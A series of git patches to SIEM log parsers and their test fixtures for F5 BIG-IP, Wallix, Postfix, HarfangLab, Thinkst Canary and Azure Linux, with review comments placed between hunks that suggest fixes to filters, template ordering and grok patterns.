@@ -334,6 +337,12 @@ stages: event.type: ["start"] filter: "{{parse_apm_event.message.PAYLOAD_USER_AUTH != None or parse_apm_event.message.PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}" + - set: + rule.name: "{{parse_apm_event.message.rule_name}}" + f5.bigip.apm.rule_item: "{{parse_apm_event.message.rule_item}}" + source.domain: "{{parse_apm_event.message.source_domain}}" + filter: "{{parse_apm_event.message.PAYLOAD_ACCESS != None}}" + - set: action.target: "network-traffic" diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json new file mode 100644 index 000000000..570d31153 --- /dev/null +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json @@ -0,0 +1,45 @@ +{ + "input": { + "message": "Sep 11 07:54:59 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_test:DMZ:111111: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'" + }, + "expected": { + "message": "Sep 11 07:54:59 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_test:DMZ:111111: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'", + "event": { + "category": [ + "authentication" + ], + "type": [ + "info" + ] + }, + "action": { + "target": "network-traffic" + }, + "f5": { + "bigip": { + "apm": { + "rule_item": "AD Query" + } + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "test.test.com" + ] + }, + "rule": { + "name": "GONE API user" + }, + "source": { + "address": "test.test.com", + "domain": "test.test.com", + "registered_domain": "test.com", + "subdomain": "test", + "top_level_domain": "com" + } + } +} \ No newline at end of file diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json new file mode 100644 index 000000000..f7f583da3 --- /dev/null +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json 
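Review bot: `source.domain: "{{parse_apm_event.message.source_domain}}"` in the new `set` stage is only populated when the message matched `HEADER_1`; for the `HEADER_2` form (no host token) the capture is absent and the template renders an empty or `None` value alongside the valid `rule.name`. Whether the engine drops such a value or stores it as `source.domain` is not visible here, so it is safer to guard it separately: `- set:` / `source.domain: "{{parse_apm_event.message.source_domain}}"` / `filter: "{{parse_apm_event.message.source_domain != None}}"`. The four fixtures added in this commit all use the `HEADER_1` form, so the other path is untested. The enclosing `stages` block continues outside the hunk.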
@@ -0,0 +1,45 @@ +{ + "input": { + "message": "Sep 11 07:55:17 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_AIM_prod:DMZ:11111111: Following rule 'fallback' from item 'GONE API Variable Assign' to ending 'Allow'" + }, + "expected": { + "message": "Sep 11 07:55:17 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_AIM_prod:DMZ:11111111: Following rule 'fallback' from item 'GONE API Variable Assign' to ending 'Allow'", + "event": { + "category": [ + "authentication" + ], + "type": [ + "info" + ] + }, + "action": { + "target": "network-traffic" + }, + "f5": { + "bigip": { + "apm": { + "rule_item": "GONE API Variable Assign" + } + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "test.test.com" + ] + }, + "rule": { + "name": "fallback" + }, + "source": { + "address": "test.test.com", + "domain": "test.test.com", + "registered_domain": "test.com", + "subdomain": "test", + "top_level_domain": "com" + } + } +} \ No newline at end of file diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json new file mode 100644 index 000000000..4b3b16a1f --- /dev/null +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json 
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "Sep 11 19:53:42 test.com notice apmd[14311]: 01490115:5: /VPN/APM_VPN_prod:VPN:11111111: Following rule 'fallback' from item 'AD Group Resource Assign' to terminalout 'Allow'" + }, + "expected": { + "message": "Sep 11 19:53:42 test.com notice apmd[14311]: 01490115:5: /VPN/APM_VPN_prod:VPN:11111111: Following rule 'fallback' from item 'AD Group Resource Assign' to terminalout 'Allow'", + "event": { + "category": [ + "authentication" + ], + "type": [ + "info" + ] + }, + "action": { + "target": "network-traffic" + }, + "f5": { + "bigip": { + "apm": { + "rule_item": "AD Group Resource Assign" + } + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "test.com" + ] + }, + "rule": { + "name": "fallback" + }, + "source": { + "address": "test.com", + "domain": "test.com", + "registered_domain": "test.com", + "top_level_domain": "com" + } + } +} \ No newline at end of file diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json new file mode 100644 index 000000000..d2b42ada9 --- /dev/null +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json 
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "Sep 11 20:52:15 test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_prod:DMZ:2c31fe0d: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'" + }, + "expected": { + "message": "Sep 11 20:52:15 test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_prod:DMZ:2c31fe0d: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'", + "event": { + "category": [ + "authentication" + ], + "type": [ + "info" + ] + }, + "action": { + "target": "network-traffic" + }, + "f5": { + "bigip": { + "apm": { + "rule_item": "AD Query" + } + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "test.com" + ] + }, + "rule": { + "name": "GONE API user" + }, + "source": { + "address": "test.com", + "domain": "test.com", + "registered_domain": "test.com", + "top_level_domain": "com" + } + } +} \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" 
@@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 723a83e9458c9252950833e6a8271e17df766287 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 8 Oct 2024 18:55:12 +0300 Subject: [PATCH 123/317] fix --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 1c01481e9..39e8a6363 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,19 +6,13 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": [ - "session" - ], + "category": ["session"], "dataset": "session_integrity", "outcome": "failure", - "type": [ - "info" - ] + "type": ["info"] }, "related": { - "user": [ - "adm@CORP.NET@1.1.1.1" - ] + "user": ["adm@CORP.NET@1.1.1.1"] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -27,4 +21,4 @@ "type": "SSH_SHELL_SESSION" } } -} \ No newline at end of file +} From 2f83058e40a8d9c1211327217aea557eb2ad4d02 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 8 Oct 2024 18:56:52 +0300 Subject: [PATCH 124/317] Apply linter --- F5 Networks/f5-big-ip/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml index 01f4599e3..d59682c69 100644 --- a/F5 Networks/f5-big-ip/ingest/parser.yml +++ b/F5 Networks/f5-big-ip/ingest/parser.yml 
@@ -112,7 +112,7 @@ pipeline: output_field: message pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}' custom_patterns: - HEADER: '%{HEADER_1}|%{HEADER_2}' + HEADER: "%{HEADER_1}|%{HEADER_2}" HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )' HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )' PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}" From df157208e0d2a1879243e6dc48f83de466f9fdbb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 8 Oct 2024 20:53:43 +0200 Subject: [PATCH 125/317] Postfix: addition of smart descriptions --- Postfix/postfix/_meta/smart-descriptions.json | 85 ++++++++++++++++++- 1 file changed, 84 insertions(+), 1 deletion(-) diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json index fe51488c7..14d83e7c2 100644 --- a/Postfix/postfix/_meta/smart-descriptions.json +++ b/Postfix/postfix/_meta/smart-descriptions.json 
@@ -1 +1,84 @@ -[] +[ + { + "value": "Event {event.category} of type {event.type} was raised. It is related to {source.ip}", + "conditions": [ + { + "field": "source.ip" + }, + { + "field": "event.category" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised with {event.outcome} from {source.address} to {destination.address}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.outcome" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}. Reason: {event.reason}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.reason" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised.", + "conditions": [ + { + "field": "event.category" + }, + { + "field": "event.type" + } + ] + } +] From 0122de8a390bb9a496dcaec65483745922fcfa16 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 8 Oct 2024 21:03:04 +0200 Subject: [PATCH 126/317] Addition of smartdesc --- Postfix/postfix/_meta/smart-descriptions.json | 80 ++++++++++++++++++- 1 file changed, 78 insertions(+), 2 deletions(-) diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json index 14d83e7c2..677e281ca 100644 --- a/Postfix/postfix/_meta/smart-descriptions.json +++ b/Postfix/postfix/_meta/smart-descriptions.json 
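Review bot: The template whose only address condition is `source.ip` is listed before the three templates that additionally require `destination.address`, `event.outcome` or `event.reason`; an event carrying `source.ip` will normally carry `source.address` as well (the fixtures on this page set both), so if a description is chosen as the first template whose conditions all hold — the ordering the other smart-descriptions files in this series follow, most specific first — the more informative templates are never reached. Ordering the list by decreasing number of conditions, with the two-condition `event.category`/`event.type` template last, avoids that. The same issue applies to the single-address templates the next commit inserts at the top of the file (hunk `@@ -13,6 +13,54 @@`) and to the six-condition template the commit after it inserts at line 118, below the five-condition templates it extends.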
@@ -1,9 +1,9 @@ [ { - "value": "Event {event.category} of type {event.type} was raised. It is related to {source.ip}", + "value": "Event {event.category} of type {event.type} was raised. It is related to {source.address}", "conditions": [ { - "field": "source.ip" + "field": "source.address" }, { "field": "event.category" @@ -13,6 +13,54 @@ } ] }, + { + "value": "Event {event.category} of type {event.type} was raised. It is related to {destination.address}", + "conditions": [ + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised. It is related to {source.address}. Reason: {event.reason}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "event.category" + }, + { + "field": "event.reason" + }, + { + "field": "event.type" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised. It is related to {destination.address}. Reason: {event.reason}", + "conditions": [ + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.reason" + }, + { + "field": "event.type" + } + ] + }, { "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}", "conditions": [ @@ -70,6 +118,34 @@ } ] }, + { + "value": "Event {event.category} of type {event.type} was raised. Email message ID: {email.message_id}", + "conditions": [ + { + "field": "event.category" + }, + { + "field": "event.type" + }, + { + "field": "email.message_id" + } + ] + }, + { + "value": "Event {event.category} of type {event.type} was raised. Reason: {event.reason}", + "conditions": [ + { + "field": "event.category" + }, + { + "field": "event.reason" + }, + { + "field": "event.type" + } + ] + }, { "value": "Event {event.category} of type {event.type} was raised.", "conditions": [ From 64c7754347e8d6145868cfd047d1b665ed8316e0 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 8 Oct 2024 21:06:25 +0200 Subject: [PATCH 127/317] Adding a smart description --- Postfix/postfix/_meta/smart-descriptions.json | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json index 677e281ca..76f7c4902 100644 --- a/Postfix/postfix/_meta/smart-descriptions.json +++ b/Postfix/postfix/_meta/smart-descriptions.json @@ -118,6 +118,29 @@ } ] }, + { + "value": "Event {event.category} of type {event.type} was raised with {event.outcome} from {source.address} to {destination.address}. Reason: {event.reason}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "event.category" + }, + { + "field": "event.outcome" + }, + { + "field": "event.reason" + }, + { + "field": "event.type" + } + ] + }, { "value": "Event {event.category} of type {event.type} was raised. Email message ID: {email.message_id}", "conditions": [ From cfde7fb1ee58899e3642f6c65ec180706cd2e2c2 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 9 Oct 2024 09:02:07 +0200 Subject: [PATCH 128/317] fix(Harfanglab): optimize grok pattern --- HarfangLab/harfanglab/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index e9a5e43fd..7ff16f6df 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -36,7 +36,7 @@ pipeline: properties: input_field: "{{json_event.message.event_data.MemberName}}" output_field: message - pattern: "(%{DATA:cn}=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})" + pattern: "([Cc][Nn]=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})" - name: agent_info From 63a3880ddea5893b5676a78e8ad01b1fc5c24cdf Mon Sep 17 00:00:00 2001 
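Review bot: The new pattern lets `first_name` run past the end of the CN, because `DATA` is `.*?` with no comma exclusion: a single-word CN such as `CN=Admin,OU=Domain Users,DC=example` (constructed example) still matches, with `first_name=Admin,OU=Domain` and `last_name=Users`, instead of being rejected. Bounding both captures to the first RDN, `([Cc][Nn]=(?<first_name>[^, ]+) (?<last_name>[^,]+),%{GREEDYDATA})`, keeps them inside the CN value, assuming the grok engine accepts inline named groups; a CN containing an escaped comma (`\,`) would still need separate handling. A short comment on the stage stating the expected input shape (`CN=<given> <family>,...`) would also help the next reader. The stage's `name` line is above the hunk.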
From: LenaigKaliou Date: Thu, 10 Oct 2024 15:49:15 +0200 Subject: [PATCH 129/317] Addition of missing smart descriptions --- .../azure-linux/_meta/smart-descriptions.json | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json index fe51488c7..c6298b1b4 100644 --- a/Azure/azure-linux/_meta/smart-descriptions.json +++ b/Azure/azure-linux/_meta/smart-descriptions.json @@ -1 +1,21 @@ -[] +[ + { + "value": "{azure_linux.message}", + "conditions": [ + { + "field": "azure_linux.message" + } + ] + }, + { + "value": "{azure_linux.message} at {@timestamp}", + "conditions": [ + { + "field": "azure_linux.message" + }, + { + "field": "@timestamp" + } + ] + } +] From 32353c71d7e05948ca036f9c2de8635d55de91de Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 10 Oct 2024 15:51:20 +0200 Subject: [PATCH 130/317] improve source ip field --- .../thinkst-canary/ingest/parser.yml | 14 ++++++- .../thinkst-canary/tests/test_incident.json | 9 ++++ .../thinkst-canary/tests/test_ip_field.json | 41 +++++++++++++++++++ 3 files changed, 62 insertions(+), 2 deletions(-) create mode 100644 ThinkstCanary/thinkst-canary/tests/test_ip_field.json diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index 13b495443..8d08b9851 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -8,6 +8,14 @@ pipeline: input_field: "{{original.message}}" output_field: message + - name: parsed_incident_field + external: + name: grok.match + properties: + input_field: "{{parsed_event.message.incident_id}}" + output_field: message + pattern: "(incident:%{WORD:event_type}:%{DATA:token_id}:%{IP:ip_address}:%{NUMBER:timestamp})" + - name: parsed_dn filter: "{{parsed_event.get('DN') != None}}" external: 
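Review bot: The new `parsed_incident_field` stage runs `grok.match` on `{{parsed_event.message.incident_id}}` unconditionally, whereas the adjacent `parsed_dn` stage guards its input with a `filter`; for events without `incident_id` the matcher is fed whatever the template renders for a missing value (`None` or an empty string, depending on the template settings). Adding `filter: "{{parsed_event.message.get('incident_id') != None}}"` keeps the two stages consistent and makes explicit that the `source.ip` fallback further down the file depends on this capture.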
@@ -52,8 +60,10 @@ stages: filter: "{{parsed_event.message.dst_host_public_ip | is_ipaddress}}" - set: - source.ip: "{{parsed_event.message.src_host}}" - filter: "{{parsed_event.message.src_host | is_ipaddress}}" + # source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}" + # filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}" + source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}" + filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}" - set: destination.domain: "{{parsed_event.message.HOST or parsed_event.message.hostname or parsed_event.message.HOSTNAME}}" diff --git a/ThinkstCanary/thinkst-canary/tests/test_incident.json b/ThinkstCanary/thinkst-canary/tests/test_incident.json index 4ed785905..80d796dbe 100644 --- a/ThinkstCanary/thinkst-canary/tests/test_incident.json +++ b/ThinkstCanary/thinkst-canary/tests/test_incident.json @@ -19,6 +19,15 @@ "product": "Thinkst Canary", "vendor": "Thinkst Canary" }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, "thinkst_canary": { "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" } diff --git a/ThinkstCanary/thinkst-canary/tests/test_ip_field.json b/ThinkstCanary/thinkst-canary/tests/test_ip_field.json new file mode 100644 index 000000000..b96beea43 --- /dev/null +++ b/ThinkstCanary/thinkst-canary/tests/test_ip_field.json 
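Review bot: The `source.ip` value and its `filter` can disagree: the filter passes when either `src_host` or the incident-derived `ip_address` is an IP address, but the value is `src_host or ip_address`, so an event whose `src_host` is a non-empty hostname while `incident_id` carries a valid IP sets `source.ip` to the hostname. Selecting the value with the same test as the filter fixes it: `source.ip: "{{parsed_event.message.src_host if parsed_event.message.src_host | is_ipaddress else parsed_incident_field.message.ip_address}}"`. The fixture added in this commit (`test_ip_field.json`) covers only the case where `src_host` is absent, so this path is untested.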
@@ -0,0 +1,41 @@ +{ + "input": { + "message": "{\"incident_id\":\"incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485\",\"event_type\":\"incident\",\"summary\":\"RDP Login Attempt\",\"timestamp\":\"1111497485\"}", + "sekoiaio": { + "intake": { + "dialect": "Thinkst Canary [BETA]", + "dialect_uuid": "89346697-b64b-45d4-a456-72fd8a2be5d8" + } + } + }, + "expected": { + "message": "{\"incident_id\":\"incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485\",\"event_type\":\"incident\",\"summary\":\"RDP Login Attempt\",\"timestamp\":\"1111497485\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "RDP Login Attempt", + "type": [ + "denied" + ] + }, + "@timestamp": "2005-03-22T13:18:05Z", + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "thinkst_canary": { + "incident_id": "incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485" + } + } +} \ No newline at end of file From 77c4de8f4f5b9a17e498a75f2915408fe392ec60 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 15:53:37 +0200 Subject: [PATCH 131/317] fix on AzureLinux smart descriptions --- Azure/azure-linux/_meta/smart-descriptions.json | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json index c6298b1b4..5fbbd554c 100644 --- a/Azure/azure-linux/_meta/smart-descriptions.json +++ b/Azure/azure-linux/_meta/smart-descriptions.json @@ -6,16 +6,5 @@ "field": "azure_linux.message" } ] - }, - { - "value": "{azure_linux.message} at {@timestamp}", - "conditions": [ - { - "field": "azure_linux.message" - }, - { - "field": "@timestamp" - } - ] } ] From 76b055696774dbeed26f04f4f2be56a645c71ac6 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Thu, 10 Oct 2024 15:55:32 +0200 Subject: [PATCH 132/317] Delete comments --- ThinkstCanary/thinkst-canary/ingest/parser.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index 8d08b9851..f8cada9ff 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -60,8 +60,6 @@ stages: filter: "{{parsed_event.message.dst_host_public_ip | is_ipaddress}}" - set: - # source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}" - # filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}" source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}" filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}" From bcacf3976acd34b1ba95ee6bdb22251d7847dbe5 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 15:55:59 +0200 Subject: [PATCH 133/317] Enhanced smart descriptions for azure linux --- Azure/azure-linux/_meta/smart-descriptions.json | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json index 5fbbd554c..cdefa7919 100644 --- a/Azure/azure-linux/_meta/smart-descriptions.json +++ b/Azure/azure-linux/_meta/smart-descriptions.json @@ -1,4 +1,18 @@ [ + { + "value": "{log.level} log received on {log.hostname}: {azure_linux.message}", + "conditions": [ + { + "field": "azure_linux.message" + }, + { + "field": "log.level" + }, + { + "field": "log.hostname" + } + ] + }, { "value": "{azure_linux.message}", "conditions": [ From 370154320193a952f18c9c004b1859aa6ee25ff2 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 10 Oct 2024 15:58:53 +0200 Subject: [PATCH 134/317] Updated tests for Azure Linux --- Azure/azure-linux/tests/auth_conversation_failed.json | 3 --- Azure/azure-linux/tests/auth_no_identity.json | 3 --- Azure/azure-linux/tests/cron_command1.json | 3 --- Azure/azure-linux/tests/cron_command2.json | 3 --- Azure/azure-linux/tests/disconnected.json | 3 --- Azure/azure-linux/tests/omsagent_command.json | 3 --- Azure/azure-linux/tests/omsagent_command2.json | 3 --- Azure/azure-linux/tests/session_closed.json | 3 --- Azure/azure-linux/tests/session_opened.json | 3 --- Azure/azure-linux/tests/systemd_session.json | 3 --- 10 files changed, 30 deletions(-) diff --git a/Azure/azure-linux/tests/auth_conversation_failed.json b/Azure/azure-linux/tests/auth_conversation_failed.json index c1ea1f581..5a761c66d 100644 --- a/Azure/azure-linux/tests/auth_conversation_failed.json +++ b/Azure/azure-linux/tests/auth_conversation_failed.json @@ -16,9 +16,6 @@ "azure_linux": { "message": "pam_unix(sudo:auth): conversation failed" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "error" diff --git a/Azure/azure-linux/tests/auth_no_identity.json b/Azure/azure-linux/tests/auth_no_identity.json index d1234db03..1da5be28d 100644 --- a/Azure/azure-linux/tests/auth_no_identity.json +++ b/Azure/azure-linux/tests/auth_no_identity.json @@ -16,9 +16,6 @@ "azure_linux": { "message": "pam_unix(sudo:auth): auth could not identify password for [omsagent]" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "critical" diff --git a/Azure/azure-linux/tests/cron_command1.json b/Azure/azure-linux/tests/cron_command1.json index 875c249f6..eef0c8095 100644 --- a/Azure/azure-linux/tests/cron_command1.json +++ b/Azure/azure-linux/tests/cron_command1.json 
@@ -8,9 +8,6 @@ "azure_linux": { "message": "(root) CMD (/usr/lib64/sa/sa1 1 1)" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/cron_command2.json b/Azure/azure-linux/tests/cron_command2.json index 18e95f8fc..b7cc4940a 100644 --- a/Azure/azure-linux/tests/cron_command2.json +++ b/Azure/azure-linux/tests/cron_command2.json @@ -8,9 +8,6 @@ "azure_linux": { "message": "(root) CMD ([ -f /etc/krb5.keytab ] && [ \\( ! -f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/disconnected.json b/Azure/azure-linux/tests/disconnected.json index afe8c9ff9..a845afb3b 100644 --- a/Azure/azure-linux/tests/disconnected.json +++ b/Azure/azure-linux/tests/disconnected.json @@ -8,9 +8,6 @@ "azure_linux": { "message": "Received disconnect from 185.122.161.248 port 39070:11: disconnected by user" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/omsagent_command.json b/Azure/azure-linux/tests/omsagent_command.json index 6ab82e12e..9b96a06aa 100644 --- a/Azure/azure-linux/tests/omsagent_command.json +++ b/Azure/azure-linux/tests/omsagent_command.json @@ -14,9 +14,6 @@ "azure_linux": { "message": "omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/omsagent_command2.json b/Azure/azure-linux/tests/omsagent_command2.json index c4bc6f554..8839131bd 100644 
